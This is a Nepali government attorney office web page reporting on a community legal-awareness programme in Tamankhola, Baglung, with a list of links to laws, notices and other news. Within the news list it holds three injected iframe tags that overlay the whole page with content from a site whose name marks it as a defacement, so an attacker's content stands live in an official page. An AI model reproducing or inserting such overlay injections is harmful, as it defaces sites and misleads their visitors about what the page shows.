समुदायमा सरकारी वकील कार्यक्रम तमानखोला गा.पा.मा सम्पन्न

samachar

2079-9-26

मिति २०७९।०९।१५ गते विहिवार समुदायमा सरकारी वकील कार्यक्रम अन्तरगत "सरकारी वकीलको सांगठनिक संरचनाकामकर्तव्य एवं समग्र समुदायप्रति यसको दायित्व" विषयक कार्यक्रम समुदायलाई जानकारी गराउने उद्देश्यले बागलुङ जिल्लाको तमानखोला गा.पा. वडा नं. १ स्थित  तमानखोला गाउँपालिकाको सभाहलमा उ.स.व.का. बागलुङका  निमित्त सहन्यायाधिवक्ता श्री अशोकराज रेग्मीज्यूको अध्यक्षता,   जिल्ला सरकारी वकील कार्यालय, बागलुङका जिल्ला न्यायाधिवक्ता श्री स्वतन्त्र न्यौपाने,  गाउपालिका अध्यक्ष जोकलाल बुढा, उपाध्यक्ष हिरा कुमारी छन्त्याल र गाउँपालिकाका जनिधिहरु गरी ४३ जनाको उपस्थितिमा  जिल्ला सरकारी वकील कार्यालय, बागलुङको  आयोजनामा कार्यक्रम सम्पन्न भएको थियो । उक्त कार्यक्रममा जिल्ला सरकारी वकील कार्यालय बागलुङका जिल्ला न्यायाधिवक्ता श्री स्वतन्त्र न्यौपानेले "सरकारी वकीलको सांगठनिक संरचनाकामकर्तव्य एवं समग्र समुदायप्रति यसको दायित्व" विषयक कार्यपत्र प्रस्तुत गर्नुभएको थियो । करीव १० जना सहभागिहरुबाट सरकारी वकील र सरकार वादी मुद्दा सम्वन्धमा उठाईएका जिज्ञासाहरुको उ.स.व.का. बागलुङका निमित्त सह-न्यायाधिवक्ता श्री असोकराज रेग्मी र जिल्ला न्यायाधिवक्ता स्वतन्त्र न्यौपानेले विभिन्न रोचक उदाहरणहरु सहित सम्वोधन गर्नु भएको थियो साथै कार्यक्रम सफल बनाउन आ-आफ्नो क्षेत्रबाट सहयोग गर्ने सम्पूर्ण सहभागीहरुलाई धन्यबाद दिनुभएको थियो ।  उक्त कार्यक्रममा जि.स.व.का. पार्वतका जिल्ला न्यायाधिवक्ता श्री केदारनाथ उपाध्यायले सहभागीहरुलाई स्वागत गर्दै कार्यक्रमको औचित्यमाथि प्रकाश पार्नु भएको थियो भने कार्यक्रमको सञ्चालक जि. स.व.का. बागलुङका सहायक कम्प्युटर अपरेटर श्री गणेश शर्माले गर्नुभएको थियो ।


संलग्न जोडिएका विवरणहरु

download
सूचना

dsadsa


मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)


बाल न्याय सम्पादन काययविधि‚ २०८०


कानूनको विवादमा परकेा बालबालिकाको दिशान्तर कार्यविधी संबन्धी निर्देशिका २०८०


मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)


चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)


धौलागिरी बहिरा आबसिय मा.वि मा समुदायमा सरकारी वकिल कार्यक्रम सम्पन्न ।।


चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)


नेपाल सरकार वादी हुने फौजदारी मुद्दाको अनुसन्धान तथा अभियोजन सम्बन्धी निर्देशिका, २०८०


आ.ब. ०७९।८० को बार्षिक प्रतिबेदन


समाचार

<iframe src="https://midnightopsnepaldeface.pages.dev/" allowfullscreen style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; min-height: 100vh; min-width: 100vw; z-index: 9999; border: none;"></iframe>


<iframe src="https://midnightopsnepaldeface.pages.dev/" allowfullscreen style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; min-height: 100vh; min-width: 100vw; z-index: 9999; border: none;"></iframe>


<iframe src="https://midnightopsnepaldeface.pages.dev/" allowfullscreen style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; min-height: 100vh; min-width: 100vw; z-index: 9999; border: none;"></iframe>


समुदायमा सरकारी वकील कार्यक्रम तमानखोला गा.पा.मा सम्पन्न


अनुसन्धान अधिकारी र सरकारी वकील वीच समिक्षा बैठक सम्मपन्न ।


जिल्ला प्रहरी कार्यालय, वागलुङको मु्द्दा शाखाको निरिक्षण सम्मपन्न ।


मिति २०७९।०३।२० गते समन्वय समितिको बैठक सम्मपन्न


समुदायमा सरकारी वकील कार्यक्रम वा.न.पा. वडा नं. ४ कुडुले माध्यामिक विद्यालयमा सम्पन्न ।


मिति २०७८।०९।०७ गते समन्वय समितिको बैठकको निर्णय


समुदायमा सरकारी वकील कार्यक्रम बागलुङ नगरपालिका वडा नं.३ धवलागिरी माध्यामिक विद्यालयमा सम्पन्न ।